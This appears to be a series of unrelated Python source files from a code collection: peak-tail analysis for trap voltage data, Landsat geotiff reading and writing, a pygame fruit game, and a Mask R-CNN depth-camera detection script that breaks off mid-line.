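name = "Example_File_T123_1234.5-3456.7V.txt"

volts = re.search(r"(\d{4}\.\d)[- ](\d{4}\.\d)V", name)
if volts:
    higher, lower = float(volts.group(1)), float(volts.group(2))
    print(lower - higher)   # the same difference the slicing version computes

turns = re.search(r"T(\d{3})", name)
if turns:
    print(int(turns.group(1)))  # the T### turn number
```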
Main function\r\n# =============================================================================\r\n \r\ndef Main(): \r\n #path to the folder containing txt files\r\n folderPath='H:\\CountsInTail\\Trap gradient dependence\\Txt files'\r\n files=GetFiles(folderPath)#get all txt files in path\r\n\r\n leftSidePercentages=[]\r\n rightSidePercentages=[]\r\n totalPercentage=[]\r\n resolvingPowers=[]\r\n xAxis=[]\r\n \r\n for file in files:# for each individual txxt file\r\n print(file)\r\n data=GetData(file)\r\n xData=data[0]\r\n yData=data[1]\r\n xVariable=GetTrapVoltlageSymmerty(file)\r\n \r\n #data has to wide of a x axis, we thus remove all data outside of a 0.2 usec radius from the central peak \r\n truncatedData=DataTruncation(xData,yData,0.2)\r\n xData=truncatedData[0]\r\n yData=truncatedData[1]\r\n #yData=Normalized(xData,yData) #Can normalize data if you want, but there is no need\r\n\r\n #assign some variables for later use\r\n integralOfData=ReimannSum(xData,yData)\r\n countsInData=sum(yData)\r\n yMaxInfo=GetMaxInfo(xData,yData)# list giving [LocationofMax,IndexOFMAx (in xData or yData)]\r\n \r\n #fit a gaussian to the data\r\n initialGuesses=[yMaxInfo[0],1,1] # syntax is [center,sigma,amplitude]\r\n popt, pcov = curve_fit(Gaussfunc, xData, yData, p0=initialGuesses) #returned popt is list pf best found fit perameters with same syntax as initialguesses\r\n gaussianFit=Gaussfunc(xData, *popt)\r\n resolvingPowers.append(str(GetResolvingPower(popt[0],popt[1])))#get labels for data with resolving power\r\n \r\n \r\n #Find gaussian chi squared\r\n #NumberofPerameters=3\r\n #errorBars=data[2] #for if you want the gaussian chi squared\r\n #errs= numpy.sqrt(numpy.diag(pcov)) #pcov is a diagnoal matrix, to get uncertainties we take te sum of diagonal. Get a list of uncertainties with same syntax as initialguesses \r\n #gaussredchi2 = Chi2reduced(yData,gaussianFit, errorBars, NumberofPerameters )\r\n \r\n \r\n #subtracting the data\r\n gaussianSubtractedData=SubtractGaussian(yData,gaussianFit)\r\n subtractedData=SubtractFWHM(xData,gaussianSubtractedData,popt[1],yMaxInfo[1])\r\n \r\n #plotting for visual understanding\r\n LogPlot(xData,yData,'k-','Original Data',False)\r\n LogPlot(xData,gaussianFit,'b-','Gaussian Fit',False)\r\n LogPlot(xData,subtractedData,'r-','Gaussian subtracted',True)\r\n \r\n #seperate the subtracted data into the left and right sides. 
This also removes negative counts\r\n leftTailxData=xData[:yMaxInfo[1]]\r\n leftTailyData= RemoveNegatives(subtractedData[:yMaxInfo[1]])\r\n rightTailxData=xData[yMaxInfo[1]:]\r\n rightTailyData=RemoveNegatives(subtractedData[yMaxInfo[1]:])\r\n \r\n #find number of counts in tails\r\n countsInLeftTail=round(sum(leftTailyData))\r\n countsInRightTail=round(sum(rightTailyData))\r\n \r\n #get integral of remaining counts in the left and right sides\r\n leftTailIntegral=ReimannSum(leftTailxData,leftTailyData)\r\n rightTailIntegral=ReimannSum(rightTailxData,rightTailyData)\r\n percentageofLeftTail=leftTailIntegral/integralOfData\r\n percentageofRightTail=rightTailIntegral/integralOfData\r\n \r\n \r\n #print statements\r\n print('\\ntotal integral: %s'% str(integralOfData))\r\n print('counts in original peak: %s'% str(countsInData))\r\n print('----------------------')\r\n print('counts in left tail: %s'% str(countsInLeftTail))\r\n print('left tail integral: %s'% str(leftTailIntegral))\r\n print('left tail percentage: %s'% str(percentageofLeftTail))\r\n print('----------------------')\r\n print('counts in right tail: %s'% str(countsInRightTail))\r\n print('right tail integral: %s'% str(rightTailIntegral))\r\n print('right tail percentage: %s'% str(percentageofRightTail))\r\n print('--------------------------------------------------------------')\r\n \r\n \r\n #append values to global lists for plotting\r\n leftSidePercentages.append(percentageofLeftTail*100)\r\n rightSidePercentages.append(percentageofRightTail*100)\r\n totalPercentage.append((percentageofLeftTail+percentageofRightTail)*100)\r\n xAxis.append(xVariable)\r\n \r\n \r\n #graphing the functions in ascending order of voltage differences\r\n leftSide=SortLists(leftSidePercentages,xAxis)\r\n rightSide=SortLists(rightSidePercentages,xAxis)\r\n total=SortLists(totalPercentage,xAxis)\r\n plt.plot(leftSide[1],leftSide[0],'bo--',label='Left Tail')\r\n plt.plot(rightSide[1], rightSide[0],'ko--',label='Right Tail')\r\n plt.plot(total[1], total[0],'go--',label='Total')\r\n \r\n for idx,xval in enumerate(xAxis):# add data lables. 
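The heart of Main is fit, subtract, integrate: fit a gaussian to the peak, clip the negative residuals to zero, and compare the tail area against the total area. Here is a self-contained sketch of that arithmetic on synthetic data, using scipy's curve_fit as the script does and numpy.trapz in place of its ReimannSum (the starting sigma is tightened for reliable convergence on this toy peak):

```python
import numpy as np
from scipy.optimize import curve_fit

def gauss(x, centre, sigma, amplitude):
    return amplitude * np.exp(-(x - centre) ** 2 / (2 * sigma ** 2))

x = np.linspace(-0.2, 0.2, 400)
y = gauss(x, 0.0, 0.01, 100) + np.random.poisson(2, x.size)  # peak plus flat tails

popt, _ = curve_fit(gauss, x, y, p0=[x[y.argmax()], 0.05, y.max()])
residual = np.clip(y - gauss(x, *popt), 0, None)  # negatives treated as zeroes

total = np.trapz(y, x)
tails = np.trapz(residual, x)
print(tails / total)   # fraction of the area left outside the fitted peak
```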
If you want to move them around verticly\r\n plt.text(xval,2,resolvingPowers[idx]) # change '2', that is the y coordinate it is displayed on\r\n \r\n plt.xlabel('Trap Symmetry: T_A2_close - T_A1_close (V)')\r\n plt.ylabel('Percentage of total area (%)')\r\n plt.legend()\r\n plt.show() \r\n \r\n \r\nMain()\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"CountsInTails_Vs_InjectionTrapVoltage.py","file_name":"CountsInTails_Vs_InjectionTrapVoltage.py","file_ext":"py","file_size_in_byte":17056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"194544559","text":"import os\nimport csv\nimport datetime\n\nimport numpy as np\nfrom osgeo import gdal\nfrom osgeo import ogr\nfrom osgeo import osr\n\nfrom dromot.utilities import conversion\nfrom dromot.features import feature\n\ndef read_landsat_dir(filedirectory, bands):\n \"\"\"\n bands must be named: blue, green, red, nir, swir1, swir2, etc...\n \"\"\"\n l5_band_map = {\"blue\":\"B1\", \"green\":\"B2\", \"red\":\"B3\", \"nir\":\"B4\", \"swir1\":\"B5\", \"thermal\":\"B6\", \"swir2\":\"B7\"}\n l7_band_map = l5_band_map\n l7_band_map[\"panchromatic\"] = \"B8\"\n l8_band_map = {\"ub\":\"B1\", \"blue\":\"B2\", \"green\":\"B3\", \"red\":\"B4\", \"nir\":\"B5\", \"swir1\":\"B6\", \"swir2\":\"B7\", \"panchromatic\":\"B8\", \"cirrus\":\"B9\", \"tirs1\":\"B10\", \"tirs2\":\"B11\"}\n filelist = os.listdir(filedirectory)\n metadata_file = open(filedirectory + \"/\" + filedirectory.split('/')[-1] + \"_MTL.txt\", \"r\")\n spacecraft = filedirectory.split('/')[-1][:4]\n date_list = None\n time_list = None\n proj = None\n line = metadata_file.readline()\n while line != \"\":\n line = line.strip().split(\" \")\n if line[0] == \"DATE_ACQUIRED\":\n date_list = line[-1].split(\"-\")\n if line[0] == \"SCENE_CENTER_TIME\":\n time_list = line[-1].split(\":\")\n if date_list is not None and time_list is not None:\n acq_date = datetime.datetime(int(date_list[0]), int(date_list[1]), int(date_list[2]), int(time_list[0][1:]), int(time_list[1]), int(float(time_list[2][:-2]))) \n line = metadata_file.readline()\n # now read each band to a raster\n st_raster = None\n data_index = 0\n z_info = {}\n for b in bands:\n z_info[b] = data_index\n data_index += 1\n if spacecraft == \"LT05\":\n infile = filedirectory + \"/\" + filedirectory.split(\"/\")[-1] + \"_\" + l5_band_map[b] + \".tif\"\n elif spacecraft == \"LE07\":\n infile = filedirectory + \"/\" + filedirectory.split(\"/\")[-1] + \"_\" + l7_band_map[b] + \".tif\"\n elif spacecraft == \"LC08\":\n infile = filedirectory + \"/\" + filedirectory.split(\"/\")[-1] + \"_\" + l8_band_map[b] + \".tif\"\n else:\n print(\"error: not a valid landsat sensor\")\n return\n ras = read_geotiff(infile, {1: b}) # doesn't return a valid date because dates are not part of geotiff metadata.\n ras.set_date(acq_date)\n if st_raster is None: # for the first raster, just initialize STFeature\n st_raster = ras\n else: # now append the new raster to the already built STFeature\n st_raster.append_feature(ras)\n st_raster.set_z_info(z_info)\n return st_raster\n\ndef read_geotiff(filename, bandmap):\n \"\"\"\n use this for reading a single geotiff that contains multiple bands\n a bandmap is a dictionary that maps band numbers to band names.\n e.g. 
{blue: 1, green: 2, red: 3, nir: 4}\n \n return:\n --------\n ras: STFeature.Raster \n a Raster containing the bands specified by the bandmap\n \"\"\"\n ds = gdal.Open(filename) # Open gdal dataset\n ras_proj = ds.GetProjectionRef() # returns SRS in WKT (its a string)\n if ds is None:\n print(\"error: can't open dataset\")\n return\n ncols = ds.RasterXSize\n nrows = ds.RasterYSize\n transform = ds.GetGeoTransform()\n cell_width = transform[1]\n cell_height = transform[5]\n x = transform[0]\n y = transform[3]\n # a check to ensure that cell_wdiths and cell_heights are consistent\n if(abs(transform[1])!= abs(transform[5])): # pixelwidth=1, pixelheight=5\n print(\"info: cell width and cell height are different\")\n data_array = None\n out_z_info = {} # a list to store names of spectral bands, levels, heights, etc. (names corresponding to z dimension)\n data_index = 0\n for b in bandmap:\n # By default get the first band\n band = ds.GetRasterBand(b)\n out_z_info[bandmap[b]] = data_index\n if band is None:\n print(\"error: can't open band\")\n return\n nodata_value = band.GetNoDataValue()\n if nodata_value is None:\n nodata_value = -9999\n if data_array is None:\n data_array = np.array([band.ReadAsArray(0, 0, ncols,nrows)]) #adding an extra dimension here\n else:\n data_array = np.append(data_array, np.array([band.ReadAsArray(0, 0, ncols,nrows)]), axis=0)\n data_array = np.where(data_array == nodata_value, np.nan, data_array) # change missing values to np.nan\n band = None\n data_index += 1\n ras = feature.Raster(data_array.astype(float),\n out_z_info,\n datetime.datetime(1111,11,11),\n ras_proj,\n \"standard\",\n None,\n x,\n y,\n cell_width,\n cell_height)\n del transform\n del data_array\n del ds\n return ras\n\n\n# should also include datetimes as a parameter to write specific dates to dthe file.\ndef write_geotiff(input_raster, outputfilename, z_values, out_data_type=gdal.GDT_Float32):\n \"\"\"\n writes the input_feature at the specified z_values to disk\n \n parameters:\n -----------\n input_raster: STFeature.raster or STFeatureStack.RasterStack\n outputfilename: string\n output location for the geotiff file\n z_values: list\n a list of z values to write to the geotiff\n\n returns:\n ---------\n None\n \"\"\"\n # credits to the HPGIS PCML library\n driver = gdal.GetDriverByName('GTiff')\n out = driver.Create(outputfilename, input_raster.ncols, input_raster.nrows, len(z_values), out_data_type)\n if out is None:\n print(\"error: cannot write to \" + outputfilename)\n return\n out.SetGeoTransform((input_raster.x, input_raster.cell_width, 0, input_raster.y, 0, input_raster.cell_height))\n out.SetProjection(input_raster.projection)\n bandnumber = 1\n for z in z_values:\n outband = out.GetRasterBand(bandnumber)\n outband.WriteArray(input_raster.data[input_raster.get_index_at_z(z)])\n outband.FlushCache()\n bandnumber+=1\n out = None\n\n\ndef csv_to_features(filename):\n indata = np.loadtxt(filename, dtype=str, delimiter=\",\")\n datelist = []\n out_rainfall = indata[1:,2].astype(float).reshape(-1,1,1,1)\n out_temp = indata[1:,3].astype(float).reshape(-1,1,1,1)\n out_rel_hum = indata[1:,4].astype(float).reshape(-1,1,1,1)\n out_wind = indata[1:,5].astype(float).reshape(-1,1,1,1)\n for row in indata[1:]:\n datelist.append(datetime.datetime(year=int(row[1][:4]),month=int(row[1][4:6]),day=int(row[1][6:]))) # append the datetime ob\n # create the featureStacks\n rain = feature.RasterStack()\n rain.create_sc_stack(out_rainfall, datelist, None, \"standard\", 0, 0, 1, -1)\n temp = 
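read_geotiff above boils down to a handful of GDAL calls per band; the following is a minimal single-band sketch of the same core, where 'scene.tif' is a hypothetical input file:

```python
import numpy as np
from osgeo import gdal

# Minimal band read; mirrors read_geotiff's essentials for one band.
ds = gdal.Open("scene.tif")                 # assumes the file exists
transform = ds.GetGeoTransform()            # (x_origin, cell_w, 0, y_origin, 0, cell_h)
band = ds.GetRasterBand(1)
data = band.ReadAsArray(0, 0, ds.RasterXSize, ds.RasterYSize).astype(float)
nodata = band.GetNoDataValue()
if nodata is not None:
    data[data == nodata] = np.nan           # same missing-value handling as above
print(data.shape, transform[0], transform[3])
```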
feature.RasterStack()\n    temp.create_sc_stack(out_temp, datelist, None, \"standard\", 0, 0, 1, -1)\n    relhum = feature.RasterStack()\n    relhum.create_sc_stack(out_rel_hum, datelist, None, \"standard\", 0, 0, 1, -1)\n    wind = feature.RasterStack()\n    wind.create_sc_stack(out_wind, datelist, None, \"standard\", 0, 0, 1, -1)\n    conversion.mpers_to_kmperh(wind)\n    return rain, temp, relhum, wind\n\ndef write_kbdi(inputfilename, outputfilename, KBDIobject):\n    kbdi = KBDIobject.data.flatten()\n    with open(inputfilename, \"r\") as inputcsv:\n        with open(outputfilename, \"w\", newline=\"\") as outputcsv:\n            reader = csv.reader(inputcsv, delimiter=\",\")\n            writer = csv.writer(outputcsv, delimiter=\",\")\n            index = 0\n            firstRow = True\n            for row in reader:\n                if firstRow:\n                    firstRow = False\n                    row.extend([\"KBDI\"])\n                else:\n                    row.extend([kbdi[index]])\n                    index+=1\n                writer.writerow(row)\n\ndef write_output(inputfilename, outputfilename, KBDIobject, FFDIobject, DFobject):\n    kbdi = KBDIobject.data.flatten()\n    ffdi = FFDIobject.data.flatten()\n    df = DFobject.data.flatten()\n    with open(inputfilename, \"r\") as inputcsv:\n        with open(outputfilename, \"w\", newline=\"\") as outputcsv:\n            reader = csv.reader(inputcsv, delimiter=\",\")\n            writer = csv.writer(outputcsv, delimiter=\",\")\n            index = 0\n            firstRow = True\n            for row in reader:\n                if firstRow:\n                    firstRow = False\n                    row.extend([\"KBDI\", \"DF\", \"FFDI\"])\n                else:\n                    row.extend([kbdi[index],df[index],ffdi[index]])\n                    index+=1\n                writer.writerow(row)\n    ","sub_path":"dromot/utilities/input_output.py","file_name":"input_output.py","file_ext":"py","file_size_in_byte":8631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"139901879","text":"#contains the main Game class and some game state classes\nimport os, sys, pygame\n##import some commonly used functions and constants\nfrom pygame.locals import *\n#import the corresponding modules\nfrom Squish import objects\nfrom Squish import config\n\nclass State:\n    #decides when the program exits\n    def handle(self, event):\n        if event.type == QUIT:\n            sys.exit()\n        if event.type == KEYDOWN and event.key == K_ESCAPE:\n            sys.exit()\n\n    def firstDisplay(self, screen):\n        #fill the screen with the background color\n        screen.fill(config.Background_color)\n        #pygame.display.update() redraws only the given areas, so each frame changes on top of the previous one,\n        #while pygame.display.flip() swaps in the whole display, so each frame is a complete picture.\n        pygame.display.flip()\n\n    def display(self, screen):\n        #used to display the state again after it has been displayed once; the default behavior is to do nothing\n        pass\n\nclass Level(State):\n    #a game level, used to count how many weights have dropped, move the sprites, and handle the other game-logic tasks\n    def __init__(self, number = 1):\n        self.number = number\n        #how many weights still have to drop in this level\n        self.remaining = config.Weight_per_level\n        #set the speed to the value from config\n        speed = config.Drop_speed\n        #add one Speed_increase for every level above one\n        speed += (self.number - 1) * config.Speed_increase\n        #create the weight and the banana\n        self.weight = objects.Weight(speed)\n        self.banana = objects.Banana()\n        both = self.weight, self.banana\n        self.sprites = pygame.sprite.RenderUpdates(both)\n\n    def update(self, game):\n        #update the game state\n        self.sprites.update()\n        #the banana touches the weight\n        if self.banana.touches(self.weight):\n            game.nextState = GameOver()\n        #the weight has landed\n        elif self.weight.landed:\n            #reset its position\n            self.weight.reset()\n            #one fewer weight remaining\n            self.remaining -= 1\n            #when all weights are used up, the level is cleared\n            if self.remaining == 0:\n                game.nextState = LevelCleared(self.number)\n\n    def display(self, screen):\n        #fill the screen with the background color\n        screen.fill(config.Background_color)\n        #update the list of rectangles that self.sprites.draw reports as needing a redraw\n        updates = self.sprites.draw(screen)\n        pygame.display.update(updates)\n\n#a state that pauses the game; any key press or mouse click ends it\n#this class is the base class of the classes below\nclass Paused(State):\n    #a bool flag telling whether the user has ended the pause\n    finished = 0\n    #set this variable to a file name if an image is wanted\n    image = None\n    #the prompt text can be set here (to taste)\n    text = 'Pause'\n\n    def handle(self, event):\n        #handle events by delegating to State (using State's method) and by reacting to key presses and mouse clicks\n        #if a key is pressed or the mouse is clicked, set the bool self.finished to true\n        State.handle(self, event)\n        if event.type in [MOUSEBUTTONDOWN, KEYDOWN]:\n            self.finished = 1\n\n    def update(self, game):\n        #if self.finished is true, tell the game to switch to the next state, given by self.nextState()\n        if self.finished:\n            game.nextState = self.nextState()\n\n    def firstDisplay(self, screen):\n        #fill with the background color\n        screen.fill(config.Background_color)\n        #set the font and the font size\n        font = pygame.font.Font(None, config.font_size)\n        #the text\n        lines = self.text.strip().splitlines()\n        #height of the text\n        height = len(lines) * font.get_linesize()\n        center, top = screen.get_rect().center\n        top -= height // 2\n        if self.image:\n            image = pygame.image.load(self.image).convert()\n            r = image.get_rect()\n            top += r.height // 2\n            r.midbottom = center, top - 20\n            screen.blit(image, r)\n        #bool flag telling whether the text is drawn antialiased\n        antialias = 1\n        #black as a tuple; each of the numbers is in the range 0~255\n        black = (0, 0, 0)\n        for line in lines:\n            #font.render takes 4 arguments: the text, an antialias flag (a bool), the text color, and the background color (optional, with a default)\n            text = font.render(line.strip(), antialias, black)\n            r = text.get_rect()\n            r.midtop = center, top\n            #blit the text at r, which gives its position\n            screen.blit(text, r)\n            top += font.get_linesize()\n        #show the frame\n        pygame.display.flip()\n\n#a subclass of Paused that shows information about the game, displayed before the Level state\nclass Info(Paused):\n    nextState = Level\n    text = '''\n    In this game you are a banana,\n    trying to survive a course in\n    self-defense against fruit, where\n    the participants will \"defend\" \n    themselves against you with a \n    16 ton weight.\n    '''\n\n#a subclass of Paused that shows an image and a welcome message, displayed before the Info state\nclass StartUp(Paused):\n    nextState = Info\n    image = config.Splash_image\n    text = '''\n    Welcome to Squish,\n    the game of Fruit Self-Defense.\n    '''\n\n#a subclass of Paused that tells the user a level has been cleared, displayed before the next Level\nclass LevelCleared(Paused):\n    def __init__(self, number):\n        self.number = number\n        self.text = '''\n        Level %i cleared\n        Click to start next level\n        '''%self.number\n\n    def nextState(self):\n        return Level(self.number + 1)\n\n#a subclass of Paused that tells the user the game is lost, displayed before restarting at the first Level\nclass GameOver(Paused):\n    nextState = Level\n    text = '''\n    Game Over,\n    click to Restart, Esc to Quit.\n    '''\n\n#the game object responsible for the main event loop, including switching between states\nclass Game:\n    def __init__(self, *args):\n        #get the directory where the images and the game are placed\n        path = os.path.abspath(args[0])\n        dir = os.path.split(path)[0]\n        #move to that directory (so the images can be opened later on)\n        os.chdir(dir)\n        #start with no state\n        self.state = None\n        #move to StartUp in the first iteration of the event loop\n        self.nextState = StartUp()\n\n    #this method sets variables dynamically, does some important initialization work, and enters the main event loop\n    def run(self):\n        #initialize pygame\n        pygame.init()\n        #a bool variable remembering whether full screen mode is on\n        flag = 0\n        if config.full_screen:\n            flag = FULLSCREEN\n        screen_size = config.Screen_size\n        #open the display and set the screen size and mode\n        screen = pygame.display.set_mode(screen_size, flag)\n        #set the window caption\n        pygame.display.set_caption('Fruit Self Defense')\n        #hide the mouse pointer\n        pygame.mouse.set_visible(False)\n        #main loop\n        while True:\n            if self.state != self.nextState:\n                self.state = self.nextState\n                self.state.firstDisplay(screen)\n            for event in pygame.event.get():\n                self.state.handle(event)\n            self.state.update(self)\n            self.state.display(screen)\n\nif __name__ == \"__main__\":\n    game = Game(*sys.argv)\n    game.run()\n\n","sub_path":"squish.py","file_name":"squish.py","file_ext":"py","file_size_in_byte":7556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"217298588","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport sys\r\nimport math\r\nimport numpy as np\r\nimport cv2 \r\nimport time\r\nimport pyrealsense2 as rs\r\nfrom mrcnn.config import Config\r\nfrom datetime import datetime\r\nfrom 
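The Game.run loop above is a small state machine: it redraws fully only when the state object changes, then delegates events and updates to the current state. A stripped-down, runnable sketch of the same pattern with a single placeholder state:

```python
import sys
import pygame
from pygame.locals import QUIT

# Minimal version of the State/Game pattern: one placeholder state.
class Splash:
    def firstDisplay(self, screen):
        screen.fill((255, 255, 255))
        pygame.display.flip()
    def handle(self, event):
        if event.type == QUIT:
            sys.exit()
    def update(self, game):
        pass   # a real state would set game.nextState here

class Game:
    def run(self):
        pygame.init()
        screen = pygame.display.set_mode((320, 200))
        self.state, self.nextState = None, Splash()
        while True:
            # redraw only on a state change, as in the loop above
            if self.state is not self.nextState:
                self.state = self.nextState
                self.state.firstDisplay(screen)
            for event in pygame.event.get():
                self.state.handle(event)
            self.state.update(self)

Game().run()
```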
skimage.measure import find_contours\r\nfrom mrcnn import utils\r\nimport mrcnn.model as modellib\r\nfrom mrcnn import visualize\r\n\r\nfrom corner_detect import corner_points\r\nfrom corner_detect import mask2contour\r\nfrom corner_config import Inference1Config\r\nfrom disturbance_delete import find_plane \r\nfrom disturbance_delete import is_disturbance\r\nfrom mrcnn import visualize2\r\n\r\n \r\nclass ShapesConfig(Config):\r\n \"\"\"Configuration for training on the toy shapes dataset.\r\n Derives from the base Config class and overrides values specific\r\n to the toy shapes dataset.\r\n \"\"\"\r\n # Give the configuration a recognizable name\r\n NAME = \"shapes\"\r\n \r\n # Train on 1 GPU and 8 images per GPU. We can put multiple images on each\r\n # GPU because the images are small. Batch size is 8 (GPUs * images/GPU).\r\n GPU_COUNT = 1\r\n IMAGES_PER_GPU = 1\r\n \r\n # Number of classes (including background)\r\n NUM_CLASSES = 1 + 29\r\n # Use small images for faster training. Set the limits of the small side\r\n # the large side, and that determines the image shape.\r\n IMAGE_MIN_DIM = 480\r\n IMAGE_MAX_DIM = 640\r\n \r\n # Use smaller anchors because our image and objects are small\r\n RPN_ANCHOR_SCALES = (8 * 6, 16 * 6, 32 * 6, 64 * 6, 128 * 6) # anchor side in pixels\r\n \r\n # Reduce training ROIs per image because the images are small and have\r\n # few objects. Aim to allow ROI sampling to pick 33% positive ROIs.\r\n TRAIN_ROIS_PER_IMAGE =150\r\n \r\n # Use a small epoch since the data is simple\r\n STEPS_PER_EPOCH = 300\r\n \r\n # use small validation steps since the epoch is small\r\n VALIDATION_STEPS = 150\r\n \r\n#class InferenceConfig(coco.CocoConfig):\r\nclass InferenceConfig(ShapesConfig):\r\n # Set batch size to 1 since we'll be running inference on\r\n # one image at a time. 
Batch size = GPU_COUNT * IMAGES_PER_GPU\r\n    GPU_COUNT = 1\r\n    IMAGES_PER_GPU = 1\r\n# Root directory of the project\r\nROOT_DIR = os.getcwd()\r\n \r\n# Import Mask RCNN\r\nsys.path.append(ROOT_DIR) # To find local version of the library \r\n# Directory to save logs and trained model\r\nMODEL_DIR = os.path.join(ROOT_DIR, \"logs\")\r\n\r\nconfig_detect = InferenceConfig()\r\nconfig_corner = Inference1Config()\r\n# Create model object in inference mode.\r\nmodel_detect= modellib.MaskRCNN(mode=\"inference\", model_dir=MODEL_DIR, config=config_detect)\r\nmodel_corner= modellib.MaskRCNN(mode=\"inference\", model_dir=MODEL_DIR, config=config_corner)\r\n# Load weights trained on MS-COCO\r\nmodel_detect.load_weights('./logs/detect_model/mask_rcnn_shapes_0030.h5', by_name=True)\r\nmodel_corner.load_weights('./logs/corner_model/mask_rcnn_shapes_0027.h5', by_name=True)\r\ndef coordinate_transform(x,y,id,M):\r\n    a=np.array([[[x,y]]],dtype='float32')\r\n    #a=np.array([a])\r\n    true_coordinate=cv2.perspectiveTransform(a,M)\r\n    \r\n    radius={1:0,\r\n            2:4.3,\r\n            3:0,\r\n            4:2.0,\r\n            5:0,\r\n            6:3.3,\r\n            7:3.2,\r\n            8:3.3,\r\n            9:0,\r\n            10:2.6,\r\n            11:0,\r\n            12:3.4,\r\n            13:0,\r\n            14:3.3,\r\n            15:2.6,\r\n            16:3.1,\r\n            17:3.3,\r\n            18:3.3,\r\n            19:3.5,\r\n            20:4.6,\r\n            21:2.7,\r\n            22:3.5,\r\n            23:3,\r\n            24:3,\r\n            25:2.9,\r\n            26:11.5,\r\n            27:3,\r\n            28:2,\r\n            29:2}\r\n    return int(true_coordinate[0][0][0]),int(true_coordinate[0][0][1]-radius[id])\r\n\r\ndef detectandmeasure(model_detect,model_corner,pipeline,pipe_profile):\r\n    #start the detection and start the timer\r\n    start=datetime.now()\r\n    detect_class_names = ['BG', 'toilet_soap', 'liquid_soap','toothpaste', 'toilet_water','duck', 'porridge','water','old_godmother','tang','gum','soda','copico','melon_seeds','red_bull','AD_milk','juice',\r\n                   'Wanglaoji','Jiaduobao', 'green_tea', 'snow_pear', 'coconut', 'black_tea','coca_cola', 'sprite', 'fenta', 'cookie', 'noodles','tea_pi','fries']\r\n    detect_class_names1=['BG','ZA001','ZA002','ZA003','ZA004','ZA005','ZB001','ZC014','ZB002','ZB004','ZB005','ZB007','ZB008','ZB010','ZC004','ZC005','ZC006',\r\n                  'ZC007','ZC008','ZC010','ZC011','ZC013','ZC009','ZC002','ZC001','ZC003','ZB003','ZB006','ZC012','ZB009']\r\n    # initialize the alignment object\r\n    align_to_color=rs.align(rs.stream.color)\r\n    # read a few frames ahead of time, to avoid unstable images while the voltage settles at startup\r\n    for i in range(5):\r\n        frames = pipeline.wait_for_frames()\r\n        color_frame = frames.get_color_frame()\r\n\r\n    # wait for the stream\r\n    frames = pipeline.wait_for_frames()\r\n    # align depth to color\r\n    frames = align_to_color.process(frames)\r\n    depth_frame = frames.get_depth_frame()\r\n    color_frame = frames.get_color_frame()\r\n    # Intrinsics & Extrinsics of the camera\r\n    depth_intrin = depth_frame.profile.as_video_stream_profile().intrinsics\r\n    color_intrin = color_frame.profile.as_video_stream_profile().intrinsics\r\n    depth_to_color_extrin = depth_frame.profile.get_extrinsics_to(color_frame.profile)\r\n    # Depth scale - units of the values inside a depth frame, i.e how to convert the value to units of 1 meter\r\n    # initialize the depth sensor\r\n    depth_sensor = pipe_profile.get_device().first_depth_sensor()\r\n    # tune the depth sensor parameters (only motion_range is understood so far)\r\n    depth_sensor.set_option(rs.option.motion_range,11)\r\n    depth_sensor.set_option(rs.option.accuracy,1)\r\n    depth_sensor.set_option(rs.option.filter_option,5)\r\n    depth_sensor.set_option(rs.option.confidence_threshold,2)\r\n\r\n    depth_sensor.set_option(rs.option.laser_power,16)\r\n    # depth scale\r\n    depth_scale = depth_sensor.get_depth_scale()\r\n    #set up count, used to track how many complete detections have succeeded\r\n    count=0\r\n    while True:\r\n        #load images inside the loop\r\n        frames = pipeline.wait_for_frames()\r\n        frames = align_to_color.process(frames)\r\n        depth_frame = frames.get_depth_frame()\r\n        color_frame = frames.get_color_frame()\r\n        if not depth_frame or not color_frame:\r\n            continue\r\n        frame = np.asanyarray(color_frame.get_data())\r\n        depth_image = np.asanyarray(depth_frame.get_data())\r\n        color_image = np.asanyarray(color_frame.get_data())\r\n        image=cv2.cvtColor(color_image,cv2.COLOR_BGR2RGB)\r\n        frame1=image.copy()\r\n\r\n        #show the video stream to help adjust the position\r\n        #cv2.imshow('camere',color_image)\r\n        #cv2.waitKey(10)\r\n\r\n        #detect the table corners\r\n        point_set=corner_points(frame1,model_corner)\r\n        #print the point information\r\n        for key in point_set:\r\n            print(key,rs.rs2_deproject_pixel_to_point(depth_intrin, [int(point_set[key][0]),int(point_set[key][1])], depth_frame.get_distance(int(point_set[key][0]),int(point_set[key][1]))))\r\n        #draw the corners that were found\r\n        if point_set:\r\n            for key in point_set:\r\n                cv2.circle(color_image,(int(point_set[key][0]),int(point_set[key][1])),2,(0,255,0),2) \r\n            #cv2.imshow('corner_point',color_image)\r\n            #cv2.waitKey(10)\r\n        if len(point_set)!=4:\r\n            point_set['corner1']=[100,100]\r\n            point_set['corner2']=[100,380]\r\n            point_set['corner3']=[500,380]\r\n            point_set['corner4']=[500,100]\r\n        ##do the perspective transform once all four corner points are found##################\r\n        if len(point_set)==4:\r\n            dst=np.array([[0, 0], [549, 0],[0, 549],[549, 549] ], dtype=np.float32)\r\n            src = np.array([point_set['corner1'],point_set['corner4'],point_set['corner2'],point_set['corner3']], dtype=np.float32)\r\n            m = cv2.getPerspectiveTransform(src, dst)\r\n            # transform with the matrix m; the result has the given image size and is padded with white\r\n            res = cv2.warpPerspective(\r\n                color_image,\r\n                m,\r\n                (549, 549),\r\n                borderValue=(255, 255, 255, 255)\r\n            )\r\n            cv2.imshow(\"perspective_transform\",res)\r\n            cv2.waitKey(10)\r\n            #after the perspective transform, start the object detection\r\n            detect_results = model_detect.detect([image], verbose=1)\r\n            r_detect = detect_results[0]\r\n            coordinate=[]\r\n            #find the equation of the tabletop plane, in preparation for rejecting disturbances later\r\n            params=find_plane(point_set,depth_frame,r_detect['rois'],depth_intrin,depth_to_color_extrin)\r\n            for i in range(len(r_detect['class_ids'])):\r\n                x=int((r_detect['rois'][i][1]+r_detect['rois'][i][3])/2)\r\n                contour=mask2contour(r_detect['masks'][:,:,i])\r\n                y_max=0\r\n                x_max=0\r\n                angle=0\r\n                #if it is a disturbance, move on to the next item; otherwise print it and add it to the coordinates\r\n                if is_disturbance(params,contour,depth_frame,depth_intrin,depth_to_color_extrin):\r\n                    print('%s is disturbance'%(detect_class_names[r_detect['class_ids'][i]]))\r\n                    continue\r\n                if 